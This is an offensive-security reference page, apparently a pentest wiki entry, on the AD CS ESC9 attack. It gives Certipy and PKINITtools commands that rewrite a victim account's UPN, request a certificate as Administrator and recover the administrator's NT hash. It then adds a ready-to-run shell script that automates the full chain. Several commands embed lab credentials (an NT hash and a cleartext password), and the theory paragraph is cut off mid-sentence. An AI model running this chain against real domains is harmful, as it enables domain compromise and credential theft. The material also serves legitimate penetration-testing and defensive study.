PRIMARY CATEGORY → ADCS

Theory

This attack leverages the absence of the security extension (szOID_NTDS_CA_SECURITY_EXT, the certificate-to-SID binding introduced by KB5014754) from the certificates the CA issues, which allows the DC


Abuse - UNIX-Like

In order to accomplish this task, an operator must control a domain account that has GenericWrite, GenericAll, WriteDACL or WriteProperty (on the userPrincipalName attribute) over another domain account, the "vulnerable user" below. The operator also needs to authenticate as that vulnerable user to request the certificate (its password or NT hash; GenericWrite over the account can yield one, for example through Shadow Credentials), and the domain controllers must not enforce strong certificate mapping (StrongCertificateBindingEnforcement set to 2), since the attack relies on the DC falling back to the UPN in the certificate.

Checking the UPN of the vulnerable user (note the value: it is needed to restore the account later)
Certipy

certipy account -dc-ip '<DC>' -username '<CONTROLLED_ACCOUNT>' -password '<PASSWD>' -user '<VULNERABLE_USER>' read
Updating the vulnerable user's UPN to the name of the target account (for instance Administrator)
Certipy

certipy account -dc-ip '<DC>' -username '<CONTROLLED_ACCOUNT>' -password '<PASSWD>' -user '<VULNERABLE_USER>' -upn '<TARGET_UPN>' update
Requesting the certificate from the CA, authenticating as the vulnerable user (whose UPN now points at the target; the PFX is saved under the target's name, here administrator.pfx)
Certipy

certipy req -dc-ip 10.129.232.88 -username 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -template 'User'
Restoring the original value of the UPN attribute (the value read in the first step; this must be done before authenticating with the certificate, otherwise the DC may still map the UPN to the vulnerable user)
Certipy

certipy account -dc-ip 10.129.232.88 -username 'p.agila' -password 'prometheusx-303' -user 'ca_svc' -upn '<ORIGINAL_UPN>' update
Pass-the-certificate + UnPAC-the-hash as the domain Administrator (certipy auth requests a TGT with PKINIT and recovers the NT hash)
Certipy

certipy auth -dc-ip 10.129.232.88 -user 'Administrator' -domain 'fluffy.htb' -pfx administrator.pfx
PKINITtools

gettgtpkinit.py (requests the TGT with the certificate and prints the AS-REP encryption key needed by the next step)

python3 gettgtpkinit.py -dc-ip '<DC>' -cert-pfx '<PFX_CERT>' '<DOMAIN>/Administrator' 'Administrator.ccache'

getnthash.py (uses the TGT and the AS-REP key printed above to recover the NT hash, i.e. UnPAC-the-hash)

export KRB5CCNAME=$( realpath '<CCACHE_FILE>' )
python3 getnthash.py -dc-ip '<DC>' -key '<AS_KEY>' '<DOMAIN>/Administrator'
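The Certipy steps above leave the vulnerable account with a rewritten UPN if anything fails between the update and the restore. The following wrapper, an added example that is not part of the original page and not Certipy's own code, records the original UPN before touching it, restores it on every exit path (including Ctrl-C), and only then authenticates with the certificate. It assumes the Certipy command lines shown on this page, that `certipy account ... read` prints attributes as `name : value` lines (the constructed sample output below is not captured from a real domain), and that `certipy req` saves the PFX under the lowercased name of the identity in the certificate, as the page's administrator.pfx suggests. Account values are passed exactly as on the page (user or user@domain, whatever your Certipy version expects).

```shell
#!/bin/sh
# ESC9-style UPN rewrite helper: save UPN -> set UPN to target -> request cert
# -> restore UPN -> authenticate. Added example, not Certipy's own code.

# Pull the userPrincipalName out of `certipy account ... read` output.
# Assumption: attributes are printed as "<name> : <value>" lines.
extract_upn() {
    awk -F ':' '$1 ~ /userPrincipalName/ {
        v = $2; sub(/^[ \t]+/, "", v); sub(/[ \t]+$/, "", v); print v; exit
    }'
}

# Name of the PFX certipy req writes, assumed to be the lowercased identity
# found in the certificate (the page's example yields administrator.pfx).
pfx_name() {
    printf '%s.pfx\n' "$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')"
}

# Constructed sample of `certipy account ... read` output for offline checks.
sample_read_output() {
    printf '%s\n' \
        "[*] Reading attributes for 'ca_svc':" \
        "    sAMAccountName                      : ca_svc" \
        "    userPrincipalName                   : ca_svc@fluffy.htb" \
        "    userAccountControl                  : 66048"
}

# Put the victim's UPN back to the value saved at the start.
restore_upn() {
    [ -n "$ORIG_UPN" ] || return 0
    echo "[*] restoring UPN of $VICTIM to $ORIG_UPN"
    certipy account -dc-ip "$DC" -username "$CTRL_USER" -password "$CTRL_PASS" \
        -user "$VICTIM" -upn "$ORIG_UPN" update
}

esc9_run() {
    DC=$1 CTRL_USER=$2 CTRL_PASS=$3 VICTIM=$4 VICTIM_NTHASH=$5
    CA=$6 TEMPLATE=$7 TARGET=$8 DOMAIN=$9

    ORIG_UPN=$(certipy account -dc-ip "$DC" -username "$CTRL_USER" \
        -password "$CTRL_PASS" -user "$VICTIM" read | extract_upn)
    if [ -z "$ORIG_UPN" ]; then
        echo "[-] could not read the current UPN of $VICTIM; refusing to continue" >&2
        return 1
    fi
    echo "[*] saved original UPN of $VICTIM: $ORIG_UPN"

    # From here on, any exit (error, Ctrl-C, kill) restores the UPN first.
    trap restore_upn EXIT
    trap 'restore_upn; trap - EXIT; exit 1' INT TERM

    certipy account -dc-ip "$DC" -username "$CTRL_USER" -password "$CTRL_PASS" \
        -user "$VICTIM" -upn "$TARGET" update || return 1

    # Authenticate as the victim (its NT hash, e.g. from Shadow Credentials);
    # the issued certificate carries the target's UPN.
    certipy req -dc-ip "$DC" -username "$VICTIM" -hashes ":$VICTIM_NTHASH" \
        -ca "$CA" -template "$TEMPLATE" || return 1

    # Restore before authenticating so the DC maps the UPN to the target.
    restore_upn
    trap - EXIT INT TERM

    certipy auth -dc-ip "$DC" -user "$TARGET" -domain "$DOMAIN" \
        -pfx "$(pfx_name "$TARGET")"
}

# Usage: sh esc9.sh <DC_IP> <CONTROLLED_USER> <CONTROLLED_PASS> <VICTIM> \
#                   <VICTIM_NT_HASH> <CA_NAME> <TEMPLATE> <TARGET> <DOMAIN>
if [ "$#" -eq 9 ]; then
    esc9_run "$@"
fi
```

Run it with the nine positional arguments listed in the usage comment; the explicit restore before `certipy auth` matters because the certificate is mapped by UPN, and a second account still carrying the target's UPN would break or misdirect the mapping.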